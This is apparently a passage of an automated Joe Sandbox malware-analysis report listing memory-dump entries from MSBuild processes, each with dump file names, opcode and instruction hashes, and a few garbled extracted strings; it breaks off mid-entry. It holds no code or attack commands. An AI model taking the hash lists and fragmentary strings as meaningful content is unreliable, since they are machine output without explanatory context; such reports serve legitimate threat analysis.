                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 44ffcf322d73c2afca031613b1047c14407fe3188f3b104c4e945fb94ead6b3d
                                                                                                                      • Instruction ID: ad145f7e35a66a874e9d8f38303640c9b0d08521f75869ed4a05e693c43e7cf2
                                                                                                                      • Opcode Fuzzy Hash: 44ffcf322d73c2afca031613b1047c14407fe3188f3b104c4e945fb94ead6b3d
                                                                                                                      • Instruction Fuzzy Hash: FAC08CB10D510C1FE300A3E4EC4BB823B1ED300322F482626740842E29DF1CA48A4268
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f259885fd8842b3df94ba1506715370e80df7539fc12d53f1a01b85688d7b73a
                                                                                                                      • Instruction ID: f790348358d60d748e605ee4d4104e8992ca3eee7f71e12cc8e0f7370f4e7a5d
                                                                                                                      • Opcode Fuzzy Hash: f259885fd8842b3df94ba1506715370e80df7539fc12d53f1a01b85688d7b73a
                                                                                                                      • Instruction Fuzzy Hash: 01D022300CE3898FE3023B20BC626113F38EC4120434802A3F00C89127E91E880E8B19
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e53c28ae55a4d34956d86fa761727bb8563ab2882612b38241d5eb9656d35b22
                                                                                                                      • Instruction ID: 1c6eaf76cd8a7375390f0c47c7f80da69f68fe7e59df8e73663218df567351db
                                                                                                                      • Opcode Fuzzy Hash: e53c28ae55a4d34956d86fa761727bb8563ab2882612b38241d5eb9656d35b22
                                                                                                                      • Instruction Fuzzy Hash: 73D01275C497484FC3128F948A512947F309E13245B2545CBEC288F373D53B8E29A792
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4f2c879680214f1ef8a1af0ea1f1b7a2403419651022d74a8e29103c43356e6a
                                                                                                                      • Instruction ID: ddd16332ec5bb6553b5ffbbb5c07a48779f169b386759b31ed0e7ac497882572
                                                                                                                      • Opcode Fuzzy Hash: 4f2c879680214f1ef8a1af0ea1f1b7a2403419651022d74a8e29103c43356e6a
                                                                                                                      • Instruction Fuzzy Hash: 16D012655192808FEF1557159D617573F20EFC2344B5A418691088F293D119CC0BC7B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 85ea6419ef6523108fed3db69e49ec88fd713733b7fd1ec0bd60899a7424047e
                                                                                                                      • Instruction ID: 7c0916e51bfaf4d477e7edf00117515738fd9e9255d17241baa557b20391e801
                                                                                                                      • Opcode Fuzzy Hash: 85ea6419ef6523108fed3db69e49ec88fd713733b7fd1ec0bd60899a7424047e
                                                                                                                      • Instruction Fuzzy Hash: C6C09B536604104FFF445155DF6B7EF3755D795340FD4901A1110573D6EF1CC4414BA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bfc8df09e4503da146afff5caf2c7c218eb4584014db622b1e869646211318a8
                                                                                                                      • Instruction ID: 879e650984c061a38adda12ee115a7d187ef14acb2b25812b985aae9a331d600
                                                                                                                      • Opcode Fuzzy Hash: bfc8df09e4503da146afff5caf2c7c218eb4584014db622b1e869646211318a8
                                                                                                                      • Instruction Fuzzy Hash: 0AC08CBC2002008FE3048B288898A277AE3FBE8301F51C818A1418722CDA35C840CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 18221f8c45c8dd9baa0a801ab1c39d499c74263f8a9423a4574b71318530be0f
                                                                                                                      • Instruction ID: 822de11a1ff328b4db2af2ecc4c7bbc70823961c23df379979541c99056f8605
                                                                                                                      • Opcode Fuzzy Hash: 18221f8c45c8dd9baa0a801ab1c39d499c74263f8a9423a4574b71318530be0f
                                                                                                                      • Instruction Fuzzy Hash: 65C022BB000200EFEB020BA0CA0BB003A30EF20B82F80C020B20CC82A0C2388002CE00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b066d32ffd7f30c9e3cf96d8a063d8034448c996aa3fc4384e2c295d36d4d411
                                                                                                                      • Instruction ID: 8852bc75330cb5a187c575a93f3f2af58861646f397a09c9751e9f2e8b52842f
                                                                                                                      • Opcode Fuzzy Hash: b066d32ffd7f30c9e3cf96d8a063d8034448c996aa3fc4384e2c295d36d4d411
                                                                                                                      • Instruction Fuzzy Hash: BEB0927094530CAF8620DB99990185ABBACDA0A310F0001D9F90887320D976E91056D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 34049abc119bf80d092a2877476b101cc00dfa6bc0f969103d053e910a0ea156
                                                                                                                      • Instruction ID: 9ccc73e3e796a2edfec78eab722b69e77d00e651c7208fe901a0d568f41d9feb
                                                                                                                      • Opcode Fuzzy Hash: 34049abc119bf80d092a2877476b101cc00dfa6bc0f969103d053e910a0ea156
                                                                                                                      • Instruction Fuzzy Hash: EAB012300DE20E8FD6407766F6965147B1EF5C02047400221B00C0521EBE6C684C4684
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.4120573041.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_12e0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9bf11ad570b27a2233bdeea3313ae2dd1eac5b0a15748c74483d8cd526db3c02
                                                                                                                      • Instruction ID: 578a631feef3c571b34025dfa3c53d88b51f8a265cb729db611525ba6e162515
                                                                                                                      • Opcode Fuzzy Hash: 9bf11ad570b27a2233bdeea3313ae2dd1eac5b0a15748c74483d8cd526db3c02
                                                                                                                      • Instruction Fuzzy Hash: 6AB0127004820D4FC74077B5F5499047F1DD5403047404222B01C0512AEF6869898788
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$LR^q$LR^q$LR^q
                                                                                                                      • API String ID: 0-3320307730
                                                                                                                      • Opcode ID: 32c3236329dd3df08607099de50de3e1f41bc79818207a5162c44227fb133277
                                                                                                                      • Instruction ID: 48ac9dbd838193acd026f6c0e5e68cd527da516a41adab23b32f829282659be6
                                                                                                                      • Opcode Fuzzy Hash: 32c3236329dd3df08607099de50de3e1f41bc79818207a5162c44227fb133277
                                                                                                                      • Instruction Fuzzy Hash: E6E1D235B002169FDB19CF68C8907BEB7B2FF88310F148569E1159B295DB34E946CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q
                                                                                                                      • API String ID: 0-388095546
                                                                                                                      • Opcode ID: cadb44be667f5e77c8c1827eeb3ef305c5bb5f66244804fa59de3e21b0c2ef5b
                                                                                                                      • Instruction ID: d81816a8eac56c605ae3497b09e0ba0efe958c59bfbb3b6d6d3b11b8cc3b25b8
                                                                                                                      • Opcode Fuzzy Hash: cadb44be667f5e77c8c1827eeb3ef305c5bb5f66244804fa59de3e21b0c2ef5b
                                                                                                                      • Instruction Fuzzy Hash: 3DF1CB30B00205DFDB28DF68D994BAEBBF2BF88704F148469D50A9B295DB35EC46CB41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 12dbe382deff07025933eef4b25988f3c0b8c482d94fa397c37b37b9f8c1d7f4
                                                                                                                      • Instruction ID: 26f28cc4e818f03c94e23f5a33776fca5fd0d04cdfd0c797b80094caeb806f4d
                                                                                                                      • Opcode Fuzzy Hash: 12dbe382deff07025933eef4b25988f3c0b8c482d94fa397c37b37b9f8c1d7f4
                                                                                                                      • Instruction Fuzzy Hash: CCE2BB30950319DBD725EF28CD44B99B7BAFF89B00F1189D5E5087B6A8CBB16AC1CB41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 25f71f3d017df1b23b950cee42e24f2155b5cb65f5b0a8609ccb7ffa2d74f8b0
                                                                                                                      • Instruction ID: 24bb707c866ad4f7a4c935545e5d5247daa35b9ec7c4efae99327996f3ddb78d
                                                                                                                      • Opcode Fuzzy Hash: 25f71f3d017df1b23b950cee42e24f2155b5cb65f5b0a8609ccb7ffa2d74f8b0
                                                                                                                      • Instruction Fuzzy Hash: 7FE2BB30950319DBD725EF28CD44B99B7BAFF89B00F1189D5E5083B6A8CBB16AC1CB41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (bq$Hbq
                                                                                                                      • API String ID: 0-4081012451
                                                                                                                      • Opcode ID: f809576c88e093e4d10caac5872d0b270b4fcf34e85b7f88d9c14ba303a1f4ab
                                                                                                                      • Instruction ID: b31c490ae20a03cea39d2522007c70015aec7c3b28f76791a5c3d933a38a431e
                                                                                                                      • Opcode Fuzzy Hash: f809576c88e093e4d10caac5872d0b270b4fcf34e85b7f88d9c14ba303a1f4ab
                                                                                                                      • Instruction Fuzzy Hash: C651AF31E00248AFDB19DFA9A8116EEBFF2EF85310F1484BAD459D7251EB344A45CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q$$^q
                                                                                                                      • API String ID: 0-355816377
                                                                                                                      • Opcode ID: 218e30852c8905067b9d4ce72ea8b957438281f83d6f096353f43b0db5c16823
                                                                                                                      • Instruction ID: f2c8cde410478432a8660116cce6ef34b7a5e277674378babda6174a5bd102ae
                                                                                                                      • Opcode Fuzzy Hash: 218e30852c8905067b9d4ce72ea8b957438281f83d6f096353f43b0db5c16823
                                                                                                                      • Instruction Fuzzy Hash: C9410535A002059FC70DEF28E84899E7BF2FF85310B01C5A9E40ACB36ADB30AD46CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `Q^q
                                                                                                                      • API String ID: 0-1948671464
                                                                                                                      • Opcode ID: 91187f6ca0773db2f9cd7744285be3e7a16e1e5a9a35b5cc67da6cd60716a3ce
                                                                                                                      • Instruction ID: 899b47f38f219560deb98f037563056d048cc43156193ba500fee4b133c22b3f
                                                                                                                      • Opcode Fuzzy Hash: 91187f6ca0773db2f9cd7744285be3e7a16e1e5a9a35b5cc67da6cd60716a3ce
                                                                                                                      • Instruction Fuzzy Hash: BE21FF71B482558FDB19EFB9C8513AD7FF2AF89301F044029C401AB395EB389806CB62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q
                                                                                                                      • API String ID: 0-1614139903
                                                                                                                      • Opcode ID: 54f59a2c5ef772fbb01f439022eb0f838c01b0c3859a300b21bcfd5468a2ce20
                                                                                                                      • Instruction ID: 48a213d83a1fe222e66adf6534425e5b8ed6f649036db0677dc64a25e48b3676
                                                                                                                      • Opcode Fuzzy Hash: 54f59a2c5ef772fbb01f439022eb0f838c01b0c3859a300b21bcfd5468a2ce20
                                                                                                                      • Instruction Fuzzy Hash: 73419674A002089FCB09EBBCE85579DBBF2FF88304F108569E109AB355EB749D45CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^q
                                                                                                                      • API String ID: 0-388095546
                                                                                                                      • Opcode ID: 402a7885aba5479f5c15bf457c869044e804f1254d87ca9eba262bab580e45a5
                                                                                                                      • Instruction ID: 0ab5d2a99db41e77e6102f8a91ea7a2cfe5ddce65212d11190e0866555685859
                                                                                                                      • Opcode Fuzzy Hash: 402a7885aba5479f5c15bf457c869044e804f1254d87ca9eba262bab580e45a5
                                                                                                                      • Instruction Fuzzy Hash: 7641D339A00105DFCB09EF28E88499E7BF6FF89711B0585A9E4168B369DB30AD45CF91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP^q
                                                                                                                      • API String ID: 0-2862610199
                                                                                                                      • Opcode ID: 6f4d96c7f51bf6ca8c9d03aa29e49918f56d763e6a2b5ebcab20ed79b485d4d3
                                                                                                                      • Instruction ID: b796d4f2a05943ed757d42fc99c68d977fd4941991fdcd42114f857dc5bd58f7
                                                                                                                      • Opcode Fuzzy Hash: 6f4d96c7f51bf6ca8c9d03aa29e49918f56d763e6a2b5ebcab20ed79b485d4d3
                                                                                                                      • Instruction Fuzzy Hash: D6317C71B002159FCB48EF78D49896E7BB2AF48714B1004A9E90ADF361DB35EC02CB81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'^q
                                                                                                                      • API String ID: 0-1614139903
                                                                                                                      • Opcode ID: e09d26e69d7cd08c7049cc965fb733f9ff9eaab67c8eac5b61777584880680bb
                                                                                                                      • Instruction ID: 4140c28e715adb31a8ef1f19875d62a5de7d30eb46dacac3a89f8a2344abaa77
                                                                                                                      • Opcode Fuzzy Hash: e09d26e69d7cd08c7049cc965fb733f9ff9eaab67c8eac5b61777584880680bb
                                                                                                                      • Instruction Fuzzy Hash: 9C318774941208DFCB09EFB8E584A9DBFB2FF44304F008569E0056F369DB759989CB51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tP^q
                                                                                                                      • API String ID: 0-2862610199
                                                                                                                      • Opcode ID: db9625a2c6dc9a35d442d2f7024db3ddddbfa4840bca4ce68f908ff5d80be535
                                                                                                                      • Instruction ID: 06a0f1a487fe233660e90c5f2d06bcf5f02ea564666d5777e6f3d06b77713aa3
                                                                                                                      • Opcode Fuzzy Hash: db9625a2c6dc9a35d442d2f7024db3ddddbfa4840bca4ce68f908ff5d80be535
                                                                                                                      • Instruction Fuzzy Hash: 34213A70B00115CFCB48EF78D49896D7BB2AF48715B2144A9E90ADB371DB35EC02CB81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `Q^q
                                                                                                                      • API String ID: 0-1948671464
                                                                                                                      • Opcode ID: 863c08840fc869c6251507a12619f3b9d4a48143f92b564aec55f59657c12ce0
                                                                                                                      • Instruction ID: b0fabfd79f0dc59ba65866e66b2405abc9ece41eea92c99cc3cb92e5be9b6c61
                                                                                                                      • Opcode Fuzzy Hash: 863c08840fc869c6251507a12619f3b9d4a48143f92b564aec55f59657c12ce0
                                                                                                                      • Instruction Fuzzy Hash: 8511C871B042158FDB58EB79C9557AE7BF2AF88311F144029D501F7384EF389945CBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: faea8435562d931b03c18d828c69c2a456c0e3ca296a7ddbf4e689d7c746e7a6
                                                                                                                      • Instruction ID: a7335a0f007fe68cfc878371ce4186b63441b9a1676152f56b1d2b9153dd54a5
                                                                                                                      • Opcode Fuzzy Hash: faea8435562d931b03c18d828c69c2a456c0e3ca296a7ddbf4e689d7c746e7a6
                                                                                                                      • Instruction Fuzzy Hash: 85F17A35610205CFDB19DF68D948AAE7BF6FF88701F158029E8268B3A9DB35DC81CB51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7f3a58ebc16e3f770279d1faac5a7ba7c1b9ac3a23324dcb7553b1798c7f4eec
                                                                                                                      • Instruction ID: 047fa969656c729ff0733827ee58a17e6a374ce29dfc3e935d3e4b708fdc6556
                                                                                                                      • Opcode Fuzzy Hash: 7f3a58ebc16e3f770279d1faac5a7ba7c1b9ac3a23324dcb7553b1798c7f4eec
                                                                                                                      • Instruction Fuzzy Hash: 00A14B30204645CFC71ADF2CC598A69BBF6EF45310B4AC5A9D4498BA76E730FD88CB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ac4a759cc552c35479502378a585b6e303289a52153ea5e0bbc27d274f7cf612
                                                                                                                      • Instruction ID: c770b7a56688be30dea10525047b9927eea1a4f1dc969d949c079270800d378b
                                                                                                                      • Opcode Fuzzy Hash: ac4a759cc552c35479502378a585b6e303289a52153ea5e0bbc27d274f7cf612
                                                                                                                      • Instruction Fuzzy Hash: 3D916E76E002089FCB19DFE5D8549EEBBFABF88700F14802AE516E7254DB35A946CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7829cfa1a6d40ab157dbbdbec45de0603d0750858d1c66db22020e44e2c95925
                                                                                                                      • Instruction ID: 16524c2189571a0eca6a9ce77699a671fa4e370affa0cc6e02f933e03f02d4da
                                                                                                                      • Opcode Fuzzy Hash: 7829cfa1a6d40ab157dbbdbec45de0603d0750858d1c66db22020e44e2c95925
                                                                                                                      • Instruction Fuzzy Hash: BC618E35B00218AFDB19DF68D894BAE7BF2BF89714F148065E509EB3A5DB34AC41CB50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aaa60d359b107ece030602db6e6de0c63db03b436726b6f55906469b93043bd8
                                                                                                                      • Instruction ID: 0a6708a89427d769b1e91e9adc798b4d84eee663b7664b2df2debb92c51846c8
                                                                                                                      • Opcode Fuzzy Hash: aaa60d359b107ece030602db6e6de0c63db03b436726b6f55906469b93043bd8
                                                                                                                      • Instruction Fuzzy Hash: A641CE31B102049FDB19CF29E888E8ABBF6EF85310F45C579D0198B766D770E849CB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 59682dea28c56f7b619132a3baea85d35ff73e97a89f72861d97d2271a7cc2ad
                                                                                                                      • Instruction ID: 62c98cc06d8c8748b17cbe18c0e85ebc73ca7ce138d0b99aa7bffcfe3394cc5c
                                                                                                                      • Opcode Fuzzy Hash: 59682dea28c56f7b619132a3baea85d35ff73e97a89f72861d97d2271a7cc2ad
                                                                                                                      • Instruction Fuzzy Hash: BA315775B001048FCB08EF78D898A6E77F6BF88724B248269E516DB3A5CB30DC06CB50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d63c9203a574abd240b113435a79bd0b40fb7ec0b52a760bf8867f7c81f19e32
                                                                                                                      • Instruction ID: 0a84ebe55b1019da9a519459153a17b052f9edcf282f6cd61de411c286f682e1
                                                                                                                      • Opcode Fuzzy Hash: d63c9203a574abd240b113435a79bd0b40fb7ec0b52a760bf8867f7c81f19e32
                                                                                                                      • Instruction Fuzzy Hash: 0831B174A10205CFD72D8F79D844BAA7BF6BF45611F0984A9E425CB292D734DC80CB62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eeaeabe91378cd903fe82ea40845d185dc722240f4730094dfae82bce966d2d9
                                                                                                                      • Instruction ID: 5a1c11f9e6edc18a59204b2f2b01c120a844567877ffa8131cabc73816a511bb
                                                                                                                      • Opcode Fuzzy Hash: eeaeabe91378cd903fe82ea40845d185dc722240f4730094dfae82bce966d2d9
                                                                                                                      • Instruction Fuzzy Hash: C7116630E0434C9FCB1ADB78D855A5E7FB6DF8A220F0040BAE4489B352DB305905C791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2290615857.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_11d0000_MSBuild.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 873e1b2ae6cb485206447e6e5870139c56032881717ec9865c0b70c267b572d9
